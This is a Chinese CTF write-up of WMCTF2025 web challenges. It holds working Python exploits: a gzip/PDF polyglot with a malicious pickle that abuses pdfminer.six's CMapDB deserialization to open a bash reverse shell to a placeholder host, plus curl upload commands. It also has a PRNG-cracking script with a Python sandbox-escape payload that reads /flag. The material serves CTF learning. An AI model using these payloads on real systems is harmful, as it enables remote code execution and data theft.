WMCTF2025-WEB-Learning

前言

简单看看。

pdf2text

pickle找链子打反序列化。

最后的pickle.loads在:

image-20250926162003698

能参考到:

pdfminer.six/pdfminer/cmapdb.py at 51683b2528e2aa685dd8b9e61f6ccf9f76a59a62 · pdfminer/pdfminer.six · GitHub

可以跟一下GadGet:

1
2
3
4
5
6
7
8
9
high_level.py::extract_pages()
pdfinterp.py::PDFPageInterpreter.process_page(page)
pdfinterp.py::PDFPageInterpreter.render_contents(resources, contents)
pdfinterp.py::PDFPageInterpreter.init_resources(resources)
pdfinterp.py::PDFResourceManager.get_font(objid, spec)
pdffont.py::PDFCIDFont.__init__(rsrcmgr, spec, strict)
pdffont.py::PDFCIDFont.get_cmap_from_spec(spec, strict)
cmapdb.py::CMapDB.get_cmap(cmap_name)
cmapdb.py::CMapDB._load_data(name)

image-20250926162041089

image-20250926162136128

image-20250926162155329

image-20250926162214328

image-20250926162228313

image-20250926162244289

image-20250926162252269

image-20250926162301023

image-20250926162315188

思路就是先打一个gzip压缩并能绕过PDF检测的含恶意Opcode数据文件进去(可以手搓也可pickle.dumps生成),至此留下恶意pickle数据;

之后再打入一个恶意pdf文件触发上述GadGetpickle.loads反序列化RCE。

注意pdfminer会在前约 1KB范围内扫描 %PDF-,而不要求从offset 0开始;一旦找到就按 PDF 规范继续解析。据此可构造类似polyglot的既是合法 PDF、又能被 gzip 按规范读取的evil.pickle.gz

本来/过不去,但是生成pdf时/Encoding指向pickle.gz绝对路径,所以可以直接用#2F转义绕过 PDFName对象限制:

EXP

genPickle.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
import zlib, struct, pickle, binascii

def build_pdf(abs_base: int) -> bytes:
header = b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"
def obj(n, body: bytes): return f"{n} 0 obj\n".encode()+body+b"\nendobj\n"

objs = []
objs.append(obj(1, b"<< /Type /Catalog /Pages 2 0 R >>"))
objs.append(obj(2, b"<< /Type /Pages /Count 1 /Kids [3 0 R] >>"))
page = b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Resources << /Font << /F1 4 0 R >> >> /Contents 5 0 R >>"
objs.append(obj(3, page))
objs.append(obj(4, b"<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>"))
stream = b"BT /F1 12 Tf (hello polyglot) Tj ET"
objs.append(obj(5, b"<< /Length %d >>\nstream\n" % len(stream) + stream + b"\nendstream"))

body = header
offsets_abs = []
cursor_abs = abs_base + len(header)
for o in objs:
offsets_abs.append(cursor_abs)
body += o
cursor_abs += len(o)

# xref stream (/W [1 4 2]):type(1B)+offset(4B BE)+gen(2B)
entries = [b"\x01" + struct.pack(">I", off) + b"\x00\x00" for off in offsets_abs]
xref_stream = zlib.compress(b"".join(entries))
xref_obj = (
b"6 0 obj\n"
b"<< /Type /XRef /Size 7 /Root 1 0 R /W [1 4 2] /Index [1 5] "
b"/Filter /FlateDecode /Length " + str(len(xref_stream)).encode() + b" >>\nstream\n" +
xref_stream + b"\nendstream\nendobj\n"
)

startxref_abs = abs_base + len(body)
trailer = b"startxref\n" + str(startxref_abs).encode() + b"\n%%EOF\n"
return body + xref_obj + trailer

def build_gzip_with_extra(extra_pdf: bytes, payload: bytes) -> bytes:
ID1, ID2, CM = 0x1f, 0x8b, 8
FLG, MTIME, XFL, OS = 0x04, 0, 0, 255
if len(extra_pdf) > 65535:
raise ValueError("FEXTRA >65535")

header = bytes([ID1, ID2, CM, FLG])
header += struct.pack("<I", MTIME)
header += bytes([XFL, OS])
header += struct.pack("<H", len(extra_pdf))
header += extra_pdf

comp = zlib.compressobj(level=9, wbits=-15)
deflated = comp.compress(payload) + comp.flush()

crc = binascii.crc32(payload) & 0xffffffff
isize = len(payload) & 0xffffffff
trailer = struct.pack("<II", crc, isize)

return header + deflated + trailer

if __name__ == "__main__":
cmd = "bash -c 'bash -i >& /dev/tcp/vps/port 0>&1'"

expr = (
"__import__('os').system(%r) or "
"{'decode': (lambda self, b: [])}"
) % cmd

class POC:
def __reduce__(self):
import builtins
return (builtins.eval, (expr,))

payload = pickle.dumps(POC(), protocol=2)

pdf = build_pdf(abs_base=12)
poly = build_gzip_with_extra(extra_pdf=pdf, payload=payload)

open("evil.pickle.gz", "wb").write(poly)
assert poly[:4] == b"\x1f\x8b\x08\x04"
assert poly.find(b"%PDF-") != -1 and poly.find(b"%PDF-") < 1024

genPDF.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import io

def encode_pdf_name_abs(abs_path: str) -> str:
return "/" + abs_path.replace("/", "#2F")

def build_trigger_pdf(cmap_abs_no_ext: str) -> bytes:
enc_name = encode_pdf_name_abs(cmap_abs_no_ext)
header = b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n"
objs = []

def obj(n, body: bytes):
return f"{n} 0 obj\n".encode() + body + b"\nendobj\n"

objs.append(obj(1, b"<< /Type /Catalog /Pages 2 0 R >>"))
objs.append(obj(2, b"<< /Type /Pages /Count 1 /Kids [3 0 R] >>"))
page = b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Resources << /Font << /F1 5 0 R >> >> /Contents 4 0 R >>"
objs.append(obj(3, page))
stream = b"BT /F1 12 Tf (A) Tj ET"
objs.append(obj(4, b"<< /Length %d >>\nstream\n" % len(stream) + stream + b"\nendstream"))
font_dict = f"<< /Type /Font /Subtype /Type0 /BaseFont /Identity-H /Encoding {enc_name} /DescendantFonts [6 0 R] >>".encode()
objs.append(obj(5, font_dict))
objs.append(obj(6, b"<< /Type /Font /Subtype /CIDFontType2 /BaseFont /Dummy /CIDSystemInfo << /Registry (Adobe) /Ordering (Identity) /Supplement 0 >> >>"))

buf = io.BytesIO()
buf.write(header)
offsets = []
cursor = len(header)
for o in objs:
offsets.append(cursor)
buf.write(o)
cursor += len(o)

xref_start = buf.tell()
buf.write(b"xref\n0 7\n")
buf.write(b"0000000000 65535 f \n")
for off in offsets:
buf.write(f"{off:010d} 00000 n \n".encode())
buf.write(b"trailer\n<< /Size 7 /Root 1 0 R >>\n")
buf.write(f"startxref\n{xref_start}\n%%EOF\n".encode())
return buf.getvalue()

if __name__ == "__main__":
abs_no_ext = "/proc/self/cwd/uploads/evil"
with open("trigger.pdf", "wb") as f:
f.write(build_trigger_pdf(abs_no_ext))
1
2
3
curl -sS -F "file=@evil.pickle.gz;type=application/pdf;filename=evil.pickle.gz"   http://localhost:11451/upload | sed -n '1,80p'

curl -sS -F "file=@trigger.pdf;type=application/pdf;filename=trigger.pdf" http://localhost:11451/upload | sed -n '1,120p'

image-20250926162922074

这道感觉还好,毕竟很多都可以用现在的ai拷打出来。。。(

guess

随机数的一个trick,访问624次之后就可以获取构造;

题目就给了个__builtin__少了个s,所以是误导项。。。

Breaking Python’s PRNG with a few values and no bruteforce

EXP

等爆破吧:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pyrandcracker import RandCracker
import time, random, requests, json, os
from tqdm import *

rd = random.Random()

url = 'http://localhost:11452'

data = []

for i in tqdm(range(624)):

res = requests.post(f'{url}/register', json={
'username':str(os.urandom(10)),
'password':'123'
})

try:
user_id = res.json()['user_id']
except Exception as e:
print(res.text)

time.sleep(0.1)
data.append(int(user_id))

# 初始化随机数生成器

# 初始化预测器
rc = RandCracker()

# data = [rd.getrandbits(32) for _ in range(624)]
for num in data:
# 提交共计312 * 64 = 19968位
rc.submit(num)
# 检查是否可解并自动求解
rc.check()

key = rc.rnd.getrandbits(32)
print(f"predict next random number is {key}")

payload = '''
[k for i,k in enumerate({}.__class__.__base__.__subclasses__()) if '__init__' in k.__dict__ and 'wrapper' not in k.__init__.__str__()][0].__init__.__globals__['__builtins__']['__import__']('os').system('mkdir /app/static/ && cat /flag > /app/static/1.txt')
'''
# payload = "[cls for cls in ().__class__.__base__.__subclasses__() if cls.__name__=='Popen'][0]('mkdir -p static && cat /flag > static/flag.txt', shell=True)"

res = requests.post(f'{url}/api', json={
'key': key,
'payload':payload
})

print(res.text)

res = requests.get(f'{url}/static/1.txt')

print(res.text)

EzParquet

欧阳学长太牛了。。又给秒了www

但既然官方都不放wp,那我不贴了hhh,等那边修了之后直接看官方的复现吧

打的时候因为我在windows上的IDEA跑的,所以需要下一个winutils.exe到hadoop文件夹并且写到环境变量里(也可以不用,System设置就行了)

之后就是生成一个parquet文件,直接上传上去让它解析就可以反弹shell了:

image-20250927001455201

image-20250927001312238

RustDesk

(待复现)

safeline(unsolved)

雷池都来了。。。

做不了做不了

参考:

WMCTF2025 Official WriteUp - W&M Team

Syclover-WP

WMCTF2025 Writeup - 星盟安全团队

WMCTF 2025 Web Writeup - L1nq - 博客园

WMCTF 2025 Web Writeup - L1nq - 博客园

WMCTF2025-Writeup by 0psu3 - lzz0403的技术博客


WMCTF2025-WEB-Learning
https://eddiemurphy89.github.io/2025/09/26/WMCTF2025-WEB-Learning/
作者
EddieMurphy
发布于
2025年9月26日
许可协议